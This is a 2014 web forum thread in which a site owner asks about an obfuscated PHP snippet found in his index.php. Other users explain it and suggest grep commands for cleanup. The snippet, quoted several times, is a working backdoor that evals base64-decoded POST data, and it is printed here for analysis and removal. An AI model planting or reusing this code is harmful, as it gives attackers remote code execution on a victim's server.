1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

WP Hack

Discussion in 'General Chat' started by KangBroke, Oct 4, 2014.

  1. #1
    Anyone know what this does? I found a guy who started to break it down, but he never said what it is actually doing. He claimed it was a WP hack.

    http://somewebgeek.com/2014/wordpress-remote-code-execution-base64_decode/
    SEMrush

    But I found it on an HTML site.


    <?php     $sF="PCT4BA6ODSE_";
    $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
    
    $s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];
    
    if(isset($s22)){eval($s21($s22));}?>
    
    
    PHP:
     
    KangBroke, Oct 4, 2014 IP
    SEMrush
  2. Anveto

    Anveto Well-Known Member

    Messages:
    676
    Likes Received:
    36
    Best Answers:
    17
    Trophy Points:
    145
    #2
    Make a unsecure wp site and you will eventually find lots of these little snippets once it gets hacked. Sometimes all they do is send mail like this one might. It gets a get request and sends it from your server. It can also be a sort of gateway to upload files to the server but this is just a speculation.

    Sometimes you will find php shells and a bunch of other stuff, if you think your site might be infected just search for "eval(" or "base64" as these are commonly used by "hackers". Please note that some plugins and scripts may use the same functions so not all code you find is deletable.

    Im not gonna link to the sites here but doing a google search for "php shell" will give you lots of results that give you the code for script like these.
     
    Anveto, Oct 4, 2014 IP
    jrbiz and KangBroke like this.
  3. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #3
    Whats crazy is I found the hack in my root index.php which is not associated with any WP.

    I still am curious what this was doing and how it got there, Been there less than a week.
     
    KangBroke, Oct 4, 2014 IP
  4. sarahk

    sarahk iTamer Staff

    Messages:
    24,415
    Likes Received:
    3,286
    Best Answers:
    94
    Trophy Points:
    615
    #4
    You should be able to work it through to identify the site it'll make a call to, probably to get some more code, and then execute it. It's years since I waded through that kind of thing but that's what I'd expect to find.
     
    sarahk, Oct 5, 2014 IP
  5. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #5
    For anyone who may have been interested, so far the

    $s21 variable outputs base64_decode

    and the $s22 variable outputs _POST

    So it appears to me to be trying to pass _POST['n36ebd7'];

    So if that helps someone to tell me a bit more.
    After all that it checks that $s22 isset and then runs eval.

    But what is actually happening? Where can I see the base64 that is being used?

    if(isset($s22)){eval($s21($s22));}
     
    KangBroke, Oct 5, 2014 IP
  6. Anveto

    Anveto Well-Known Member

    Messages:
    676
    Likes Received:
    36
    Best Answers:
    17
    Trophy Points:
    145
    #6
    its waiting for a post request with the key n36ebd7 and when it is received it will do something with that request, for example the value of that key could be an array with a message which will then be sent from your infected website, sort of like a proxy, your server gets the blame for sending the "hackers" spam.
     
    Anveto, Oct 6, 2014 IP
    KangBroke likes this.
  7. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #7
    So what can I do to search all of my files at one time?

    I went through all my files using notepad++ and removed all lines with
    
    <?php     $sF="PCT4BA6ODSE_";
    $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
    
    $s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];
    
    if(isset($s22)){eval($s21($s22));}?>
    
    PHP:
    However I am not finding any with the n36ebd7

    I am just now beginning to grasp using PuTTY, and godaddy does give me SSH. Is there any way to find out how they actually got into my hosting?

    Is there anyway to find out more?
     
    KangBroke, Oct 6, 2014 IP
  8. KangBroke

    KangBroke Notable Member

    Messages:
    1,025
    Likes Received:
    58
    Best Answers:
    4
    Trophy Points:
    215
    #8
    and on a new note, all files use the same

    
    <?php     $sF="PCT4BA6ODSE_";
    $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);
    $s22=${strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2])}['n571d85'];
    if(isset($s22)){eval($s21($s22));}?>
    
    PHP:
    And the part that switches is the ['n571d85'] in another file everything is the same except that part, which in example is ['n95dde0'] so how can I track this down, currently I try running the command

    $ grep  "n95dde0" *.php
    Code (markup):
    And that is pulling nothing
     
    KangBroke, Oct 6, 2014 IP
  9. Anveto

    Anveto Well-Known Member

    Messages:
    676
    Likes Received:
    36
    Best Answers:
    17
    Trophy Points:
    145
    #9
    I have used phpstorm to search all files in the past whenever this has happened to a client. Best bet is usually to restore from backup though.

    A quick google search will give you these commands

    
    find . -exec grep -i eval {} ; | grep base64; — look for long strings of numbers and letters
    find . -exec grep -l eval {} ; | grep base64; — Gives names of files
    
    Code (markup):
    as I said, look for "eval(" or "base64" in all files. Note that some wp plugins may use these functions and not be "bad" so be careful when deleting stuff.
     
    Anveto, Oct 6, 2014 IP
    KangBroke likes this.